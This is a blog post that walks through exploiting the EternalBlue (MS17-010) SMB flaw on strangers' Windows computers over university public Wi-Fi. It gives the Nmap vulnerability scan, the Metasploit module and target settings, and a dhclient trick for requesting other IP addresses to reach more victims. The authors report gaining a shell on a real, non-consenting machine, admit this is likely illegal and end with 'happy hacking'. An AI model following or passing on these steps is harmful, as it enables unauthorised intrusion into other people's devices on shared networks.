Open in app

Sign in

Write

Sign in

How to use EternalBlue to Exploit SMB Port using Public Wi-Fi

Melvin Ismanto (AlienScavenger)
8 min readJun 18, 2019

--

In this article, we will try how we penetrate someone’s computer and gain control over it. There are varieties ways to penetrate, but in this article we will focus on SMB Port 445 exploits.

(Disclaimer: Everything that we does here is most likely ILLEGAL in any country, thus we do NOT recommend anyone to replicate what we did. This is for our academic purpose only. No personal devices and informations is harmed, shared or used for our own benefit. We fully respect everyone’s device that we try to hack, and will try our best to not damage it, or disturb the owner)

Table of Content

  • Introduction about SMB
  • EternalBlue Exploit
  • Metasploit Framework
  • Requirement
  • Methodology

Introduction about SMB

SMB, stands for Server Message Block (in modern language is also known as Common Internet File System or CIFS), uses port 445 to operate as an application-layer network protocol, primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. Most usage of SMB involves computers running Microsoft Windows.

Malicious hackers admit, that Port 445 is vulnerable and has many of insecurities. The SMB is a network file sharing protocol and “allows applications on a computer to read and write to files and to request services” that are on the same network.

Microsoft says the security update it issued is Critical, and following WannaCry, it released a rare Windows XP patch after officially ending support for the software in 2014.

Variants of the SMB protocol have improved the original implementation’s capabilities, scalability, security and efficiency. Here is a brief overview of the version of Windows SMB:

  • CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.
  • SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.
  • SMB 2.0 / SMB2: This version used in Windows Vista and Windows Server 2008.
  • SMB 2.1 / SMB2.1: This version used in Windows 7 and Windows Server 2008 R2.
  • SMB 3.0 / SMB3: This version used in Windows 8 and Windows Server 2012.
  • SMB 3.02 / SMB3: This version used in Windows 8.1 and Windows Server 2012 R2.
  • SMB 3.1: This version used in Windows Server 2016 and Windows 10.

EternalBlue Exploit

As we mentioned before, in this article we will more focus about EternalBlue, one of the exploit which utilizes the bug inside SMB protocol. EternalBlue (patched by Microsoft via MS17–010) is a security flaw related to how a Windows SMB 1.0 server handles certain requests.

Multiple versions of Windows are vulnerable to EternalBlue. “The severity ratings indicated for each affected software assume the potential maximum impact of the vulnerability,” states in Microsoft Security Bulletin.

The company’s security page details version of Windows Vista, Windows server 2008, Windows 7, Windows Server 2008 R2, Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10, and Windows Server 2016 can all be impacted by the EternalBlue exploit. However, Windows 7 and below is the main target for this article.

Metasploit Framework

Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is best-known open source sub-project, Metasploit Framework, is a penetration testing framework that makes hacking more simple and easy. It is a tool for developing and executing exploit code against a remote target machine. The basic steps for exploiting system using the Framework include:

  1. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
  2. 2. Optionally checking whether the intended target system is susceptible to the chosen exploit;
  3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a reverse bind shell to create a session with the victim);
  4. Executing the exploit process and unloading the payload to the victim’s device

Requirement

We’ll be using Kali Linux for our this article, since the tools we will be using has already been preinstalled. But this should works fine for most Linux distro. So if you haven’t installed Linux already, go install it now. For us, since we want to try to do this on a real network, we dual boot the Linux instead of installing it on a virtual machine. This way, we have direct access to our network interface (Wi-Fi).

Otherwise, if you want to try it on a virtual machine, you can also do that by using either VMware or Virtual Box. Just make sure that you install the OS on two virtual machine, one as the attacker, and one as the target.

Before we move on with the hacking process, we expect you to already have Nmap and Metasploit installed on your Linux. You can go to their website for more information on how to install it on your system.

Methodology

The way we are going to conduct our hack is by going to public area with public Wi-Fi, it doesn’t matter if the Wi-Fi is open or secured(password-protected). In our case, we will be using the university Wi-Fi to look for our target. The main step for this hacking process is as follows:

  1. Connect to the public Wi-Fi and check your network IP
  2. Search for vulnerable devices using Nmap
  3. Try to exploit the vulnerable device using Metasploit

Check your network IP

First, check which network you are currently in. For Linux, run the command “ifconfig”, and check the number on the part after “inet”. That is your current IP on the network. Take just the 3 first segment of the IP range (in this case, it is 172.16.166.*). Keep this number in mind, or just copy paste it to a note.

ifconfig command

Scanning Vulnerability

For scanning the network, we will be a popular networks scanning tool called Nmap. It is used by many pentester (and the not so good one) to identify the vulnerable devices on a network. This is the first step of many hacking process, reconnaissance or scanning.

Nmap present various scripts to identify a state of vulnerability for specific services. For our purpose, Nmap has a inbuilt script for to identify devices with vulnerabilities to the SMB exploit. The Nmap Scripting Engine (known as NSE) is one of the powerful features of Nmap. It allows user to write simple script that distributed with nmap, or write their own to fulfill their needs.

Scanning with Nmap

#nmap -p 445 - -open - -script smb-vuln* 172.16.182.*

Let’s start by typing the script above to the nmap command box (We will be using the GUI version of Nmap, also known as Zenmap, for this guide, because it’s easier to look at). The script is actually comprised of multiple command.

As we can see here, we are using “-p 445”, meaning we’re only focusing on SMB Port 445, and we’re also using “- -open” to make only find the port which are open (this way we can send packets to it).

The line “- -script smb-vuln*” is a script built-in on Nmap to also scan if the host is vulnerable to the SMB device. From the given picture above, the target is exploitable to MS17–010, which mean we can use EternalBlue to hack into it.

The next line is just the range of IP which we will be scanning. This will be the previous IP you have copied, that is, your current network IP. Asterisk here mean that we are going to scan every possible number on that IP segment.

(note that for that script, we have moved our laptop to a different place, which means that we are connecting to a different Wi-Fi. That makes our laptop received a different IP address form the DHCP server, different with the IP we had on the time of making the first screenshot. Sorry for the confusion)

Metasploit

We already know that the target is vulnerable to MS17–010 (code name EternalBlue) and we can use a program called Metasploit to exploit the targets. Further we will run the following module/command which will directly exploit the target machine.

First step, run Metasploit by opening a new command window, and type the command: msfconsole. (sorry, no screenshot)

Fig. 2

Then, we have to find the appropriate exploit from the huge library that Metasploit have.

#use exploit/windows/smb/ms17_010_eternalblue

The next step is we set the rhost, which is the IP address of the target.

#set rhosts 172.16.182.159”.

Finally, just type “exploit”, and hope that the hack works. If not, you can just try again one or two more time.

Fig. 3

We have successfully access the remote machine shell as shown in the image above (Fig. 3).

Fig. 4

To make sure we’re really successfully access the target machine, we try to move to another directories.(Fig. 4)

Additional Information

The hard part of this process is not the hacking part, but actually the gathering information part. It is NOT easy to find the compatible (read: vulnerable) computer to hack into. Even though we are connected to a university network, which theoretically supposed to consist of thousands of hosts, we are actually limited to the class C IP subnet (e.g. 192.168.0.[0–254]). So to extend our network coverage, we need to find a way to change our IP to also cover the class B IP subnet (i.e. 192.168.[0–254].[0–254]).

The university we tested on uses a DHCP server to gives out IP to the client connected to it. We find a way (at least on Linux) to request specific IP from the DHCP server. The step we took is as follows:

  • Open the file on “/etc/dhcp/dhclient.conf”
  • Add “send dhcp-requested-address xx.xx.xx.xx;” to the end of the file, where xx.xx.xx.xx is your requested IP.
  • Open a new terminal
  • Run the following code:
    #dhclient -r -v
    #dhclient -4 -d -v -cf /etc/dhcp/dhclient.conf wlan0

And if the DHCP server doesn’t response you back with a lease time, that means that the DHCP server can’t provide you with that IP. Change the IP address, and try again until you find the allowed IP.

Closing Words

As you can see, it is not as complex as some people would think. Metasploit really makes hacking really simple, and even fun!

There you go guys, hope you find this article helpful and informative, and happy hacking!

References

[1] Chandel, Raj (January 10, 2019). “SMB Penetration Testing (Port 445)”. Hacking Articles. https://www.hackingarticles.in/smb-penetration-testing-port-445/

[2] https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for

[3] https://blog.trendmicro.com/trendlabs-security-intelligence/ms17-010-eternalblue/

[4] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010

[5] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

[6] https://www.metasploit.com/

Metasploit
Hack

--

--

Melvin Ismanto (AlienScavenger)

Written by Melvin Ismanto (AlienScavenger)

9 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams